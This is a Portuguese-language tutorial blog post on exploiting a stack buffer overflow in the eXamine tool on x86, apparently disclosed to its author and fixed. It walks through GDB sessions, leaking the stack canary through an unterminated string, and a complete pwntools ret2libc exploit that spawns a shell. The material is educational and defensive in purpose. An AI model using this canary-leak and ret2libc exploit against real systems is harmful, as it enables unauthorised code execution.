Bypassando NX e Canary em x86

1523577600

Ou “pwning for dummies”

Mês passado o Fernando Mercês pediu pelo Twitter que reportássemos bugs em uma ferramenta dele. Como estava estudando pwning, imaginei que procurar por vulnerabilidades nos repositórios dele seria um bom desafio. ( ̶s̶o̶r̶r̶y̶ ̶m̶e̶r̶c̶ê̶s̶ )

Encontrei um Stack Buffer Overflow na tool eXamine e escrevi um exploit bypassando várias proteções “modernas” como o NX e o Canary.
Esse texto é um write up bem introdutório sobre essas proteções e como foi o processo de escrever o exploit com o pwntools para a arquitetura x86, depois soltarei outro texto para x64, também assumo que o leitor já tenha algum conhecimento sobre buffer overflows, Assembly e etc.

A vulnerabilidade foi consertada em tempo recorde de 2 dias.
Se você for um l33t0 apressado, o exploit tá lá embaixo.

Stack Buffer Overflow

Reprodução da função main do código vulnerável

            int main(int argc, char *argv[]) {
                int i;
                char s[MAX_CMD_LINE], c;

                memset(s, 0, MAX_CMD_LINE);

                // Loop until Ctrl+C is pressed
                for (i=0; ; i++) {
                    if ((c = getchar()) == EOF) // End Of File reached when reading from a pipe
                        break;

                    if (c == '\n') {
                        examine(s);
                        memset(s, 0, MAX_CMD_LINE);
                        i=-1;
                        putchar('\n');
                    }
                    s[i] = c;
                }

                return 0;
            }

Note a linha 18, ela escreve um char na array “s” mas nunca checa se o “i” é maior do que o tamanho da array. Assim, podemos escrever o quanto quisermos na stack. Agora fica fácil de redirecionar a execução do programa para onde quisermos, é só colocar um shellcode na stack e executa-lo, certo ?

Errado ( ̶o̶t̶á̶r̶i̶o̶!̶), o problema é que essa vulnerabilidade já tem mais de 40 anos, e com o tempo os sistemas operacionais foram implementando várias proteções que dificultam enormemente a exploração.

Utilizando o checksec conseguimos verificar todas as proteções no nosso binário: Canary; RELRO e NX — Eu desabilitei o ASLR da minha máquina, porque ̶s̶o̶u̶ ̶n̶0̶0̶b̶ ativado faria com que as alocações de memória fossem aleatórias, tentarei fazer um exploit para bypassar ele também no futuro.

            $ checksec examine32  
            \[\*\] ‘/home/vagrant/host/CTF/mentebinaria/examine/examine32’  
             Arch: i386–32-little  
             RELRO: Partial RELRO  
             Stack: Canary found  
             NX: NX enabled  
             PIE: No PIE (0x8048000)  
             FORTIFY: Enabled

No-eXecute

Também conhecido como NX, essa proteção determina quais áreas da memória poderão ser executadas. Impedindo assim, que o atacante coloque seu payload malicioso na Stack e o execute com alguma vulnerabilidade. Existem inúmeras maneiras de evitar essa proteção, neste exploit eu usei o _ret2libc — _recomendo a leitura do primeiro artigo sobre o assunto.

A idéia principal do ret2libc é que ao invés de redirecionarmos a execução do programa para o nosso payload na stack, vamos executar algo da libc como um system(“/bin/sh”) por exemplo. Para fazermos isso precisamos passar argumentos para a função. No x86 os argumentos ficam na stack, então temos que prepará-la de acordo com o que quisermos fazer. No caso nossa stack terá que se parecer com essa :

Então temos que descobrir os endereços. Para fazer isso podemos utilizar o GDB com o peda. Descobrindo os endereços de exit e de system na libc:

            gdb-peda$ p system  
            $1 = {<text variable, no debug info>} 0xf7e19e70 <system>  
            gdb-peda$ p exit  
            $2 = {<text variable, no debug info>} 0xf7e0cf50 <exit>

Também precisamos encontrar o endereço da string “/bin/sh” :

            gdb-peda$ find “/bin/sh”  
            Searching for ‘/bin/sh’ in: None ranges  
            Found 1 results, display max 1 items:  
            libc : 0xf7f39fcc (“/bin/sh”)

Importante notar que é necessário saber qual a versão do libc na máquina alvo para encontrar as funções desejadas (system por exemplo), calculando os offsets através do endereço base de memória alocada para libc. Pois os offsets se diferenciam entre as versões. Aqui tem uma database de versões para ajudar a encontrar : github.com/niklasb/libc-database — Discutirei isso mais a fundo no próximo post.

Vamos começar o esboço do nosso exploit.

from pwn import *

            p = process("./examine32")
            system = 0xf7e19e70
            exit = 0xf7e0cf50
            bash = 0xf7f39fcc
            offset = ???

            exploit = "A"*offset+p32(system)+p32(exit)+p32(bash)+"\xff"

            p.sendline(exploit)
            p.interactive()

Abrimos o processo, declaramos os endereços, montamos o payload e adicionamos o 0xff para servir de EOF — Vide linha 9 do código, precisamos do EOF para atingirmos o return.

Mas ainda não sabemos o offset, vamos descobri-lo usando o GDB :
Leia os # , são meus comentários.

            $ gdb ./examine32  
            \[... cortado\]  
            gdb-peda$ pattern\_create 2000 pat   
            Writing pattern of 2000 chars to filename “pat”  
            \# Primeiro criamos um arquivo "pat" de tamanho 2000 com um pattern para podermos identificar exatamente o offset  
            gdb-peda$ r < pat # rodando o programa com o arquivo pat  
            Starting program: /home/vagrant/host/CTF/mentebinaria/examine/examine32 < pat

            Program received signal SIGSEGV, Segmentation fault.  
            \# Recebemos um SIGSEGV, vamos analizar por que.  
            \[... cortado\]  
            \[ — — — — — — — — — — — — — — — — — — -code — — — — — — — — — — — -\]  
             0xf7e0c5cb <getenv+107>: mov esi,DWORD PTR \[ebp+0x0\]  
             0xf7e0c5ce <getenv+110>: test esi,esi  
             0xf7e0c5d0 <getenv+112>: je 0xf7e0c62a <getenv+202>  
            \=> 0xf7e0c5d2 <getenv+114>: cmp di,WORD PTR \[esi\]  # por algum motivo o binário foi parar em getenv e bugou pois o valor de ESI foi sobrescrito  
            \[... cortado\]

            gdb-peda$ bt # vamos checar com o backtrace porque o binário foi parar em getenv  
            #0 0xf7e0c5d2 in getenv () from /lib32/libc.so.6  
            #1 0xf7e4230b in ?? () from /lib32/libc.so.6  
            #2 0xf7ed5c9b in \_\_fortify\_fail () from /lib32/libc.so.6  
            #3 0xf7ed5c2a in \_\_stack\_chk\_fail () from /lib32/libc.so.6 # Opa ,o que é isso ?   
            #4 0x08048767 in main ()

Recebemos um SIGSEGV pois o binário chamou __stack_chk_fail, vamos fazer uma breve análise no IDA para entendermos porque ele foi parar lá.

Na seta 1 ele compara o nosso input com 0xff , isso corresponde a linha 9 do main, onde ele compara com EOF e que resulta no return. Mas antes de ir para o return ele vai para seta 2 onde ele compara um valor da stack “$esp+3FCh” com outro um valor “$gs:14h” e checa se são iguais, caso não forem ele chama a função __stack_chk_fail, que causou o erro.

Canary

Isto é chamado de Canary, ou stack cookie, um valor randômico que o programa conhece que é colocado na stack e antes de fazer um return é checado se ele foi alterado. Nosso problema é que para fazermos o ret2libc, ou qualquer outra técnica de buffer overflow, vamos acabar sobrescrevendo o Canary. Então para bypassa-lo precisamos conhecer o seu valor.

Mas antes de tentarmos descobrir o valor, precisamos ainda descobrir o offset correto. Para isso, voltemos ao GDB. Vamos basicamente ignorar a checagem do Canary e ver o que acontece.
Leia os # , são meus comentários.

            $ gdb ./examine32  
            gdb-peda$ disas main  
            \# Vamos encontrar onde ele faz a checagem que vimos no IDA  
            Dump of assembler code for function main:  
             \[... cortado\]  
             0x08048748 <+152>: xor eax,eax # É aqui onde começa o a checagem do Canary  
             0x0804874a <+154>: mov esi,DWORD PTR \[esp+0x3fc\]  
             0x08048751 <+161>: xor esi,DWORD PTR gs:0x14  
             0x08048758 <+168>: jne 0x8048762 <main+178>  
             0x0804875a <+170>: lea esp,\[ebp-0xc\]  
             0x0804875d <+173>: pop ebx  
             0x0804875e <+174>: pop esi  
             0x0804875f <+175>: pop edi  
             0x08048760 <+176>: pop ebp  
             0x08048761 <+177>: ret  
             0x08048762 <+178>: call 0x80485e0 <\_\_stack\_chk\[email protected]>  
            End of assembler dump.  
            gdb-peda$ b \* main+161 # colocando um breakpoint para logo antes do jne  
            Breakpoint 1 at 0x8048751  
            gdb-peda$ r < pat # executando o programa

            \[... cortado\]  
            \[ — — — — — — — — — — — — — -code — — — — — — — — — — — — — — — — -\]  
             0x8048741 <main+145>: lea esi,\[esi+eiz\*1+0x0\]  
             0x8048748 <main+152>: xor eax,eax  
             0x804874a <main+154>: mov esi,DWORD PTR \[esp+0x3fc\]  
            \=> 0x8048751 <main+161>: xor esi,DWORD PTR gs:0x14  
             0x8048758 <main+168>: jne 0x8048762 <main+178>  
             0x804875a <main+170>: lea esp,\[ebp-0xc\]  
             0x804875d <main+173>: pop ebx  
             0x804875e <main+174>: pop esi  
            \[ — — — — — — — — — — —— — — stack — — — — — — — — — — — — — — — -\]  
            \[... cortado\]  
            Breakpoint 1, 0x08048751 in main () # atingimos o breakpoint  
            gdb-peda$ s # indo para o jne  
            \[... cortado\]  
            \[ — — — — — — — — — — — — — — — — -code — — — — —— — — — — — — — -\]  
             0x8048748 <main+152>: xor eax,eax  
             0x804874a <main+154>: mov esi,DWORD PTR \[esp+0x3fc\]  
             0x8048751 <main+161>: xor esi,DWORD PTR gs:0x14  
            \=> 0x8048758 <main+168>: jne 0x8048762 <main+178>  
             | 0x804875a <main+170>: lea esp,\[ebp-0xc\]  
             | 0x804875d <main+173>: pop ebx  
             | 0x804875e <main+174>: pop esi  
             | 0x804875f <main+175>: pop edi  
             |-> 0x8048762 <main+178>: call 0x80485e0 <\_\_stack\_chk\[email protected]>  
             0x8048767 <\_start>: xor ebp,ebp  
             0x8048769 <\_start+2>: pop esi  
             0x804876a <\_start+3>: mov ecx,esp  
             JUMP is taken  
            \[... cortado\]  
            0x08048758 in main ()  
            gdb-peda$ j \* main+170 # dando um jump para 0x804875a, ignorando o jne  
            Continuing at 0x804875a.

            Program received signal SIGSEGV, Segmentation fault.  
            \[ — — — — — — — —— — — — — registers — — — — — — — — — — — — — — -\]  
            EAX: 0x0  
            EBX: 0x6e41246e (‘n$An’)  
            ECX: 0xf7f858a4 → 0x0  
            EDX: 0xffffffff  
            ESI: 0x436e416e (‘nAnC’)  
            EDI: 0x412d6e41 (‘An-A’)  
            EBP: 0x6e41286e (‘n(An’)  
            ESP: 0xffffd650 (“An)AnEAnaAn0AnFAnbAn1AnGAncAn2AnHAndAn3AnIAneAn4AnJAnfAn5AnKAngAn6AnLAnhAn7AnMAniAn8AnNAnjAn9AnOAnkAnPAnlAnQAnmAnRAnoAnSAnpAnTAnqAnUAnrAnVAntAnWAnuAnXAnvAnYAnwAnZAnxAnyAnzAC%ACsACBAC$ACnACCAC-AC(ACDAC”…)  
            EIP: 0x3b6e4144 (‘DAn;’) # EIP sobrescrito  
            EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)  
            \[ — — — — — — — — — — — — — -code — — — — — — — — — — — — — — — -\]  
            Invalid $PC address: 0x3b6e4144  
            \[... cortado\]  
            Stopped reason: SIGSEGV  
            0x3b6e4144 in ?? ()  
            gdb-peda$ pattern\_offset “DAn;” # procurando o offset de “DAn;”   
            DAn; found at offset: 1032 # achamos o offset

Lendo o Canary

Precisamos de alguma forma ler o conteúdo do Canary para coloca-lo certo na stack. 
Depois de receber um input o programa executa o código abaixo, que transforma a array para URL Encoding.

            for (i=0; i < strlen(s); i++)  
                 printf("%%%2X", s\[i\]);

Essa é a stack normal do programa, com o Canary logo depois da array que estamos sobrescrevendo. Note os bytes nulos no final dos dois.

Uma string, sendo uma array de chars, tem seu término delimitado pelo byte nulo. Se sobrescrevermos apenas o nullbyte da string “s” o strlen continuará contando até encontrar o outro nullbyte do Canary, assim, conseguiremos printar o valor do Canary.
Segue :

            $ python -c “print ‘A’\*1001” > aaa # 1001 é o tamanho da array  
            $ ./examine32 < aaa  
            \[... cortado\]  
            URL encoding: %41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%FFFFFF9C%FFFFFFCF%FFFFFFD3%FFFFFFC4%43%FFFFFFF8%FFFFFFF7

Conseguimos assim ler os valores do Canary, depois temos apenas que montar a stack com o valor dele para não cairmos no __stack_chk_fail.

E o exploit final :

            from pwn import *

            p = process("./examine32")
            offset = 1032 # offset para sobrescrever o EIP
            read_canary_payload = "A"*1001 # sobrescrevendo o nullbyte para leakar o valor do Canary
            p.sendline(read_canary_payload)
            canary = p.recvuntil("Timestamp").split("%") 
            canary = [canary[i][-2:] for i in range(-7,0)][:3] # Lendo o output
            canary = [x.replace(" ","0") for x in canary] # o zero buga o printf
            print "[!] Canary found : "+str(canary)
            canary = int(''.join(canary),16)

            system = 0xf7e19e70
            exit = 0xf7e0cf50
            bash = 0xf7f39fcc

            exploit = "A"*1000+p32(canary)[::-1]+"\x00" # o canary acaba com nullbyte
            exploit += ("A"*(offset-len(exploit)))+p32(system)+p32(exit)+p32(bash)+"\xff" # 0xff = EOF
            p.sendline(exploit)
            p.interactive() # g0t sh3ll ?

Como em x64 os argumentos ficam nos registradores, precisaremos fazer mais coisa antes de chamar o system, esse será o tópico do próximo post.

Inté !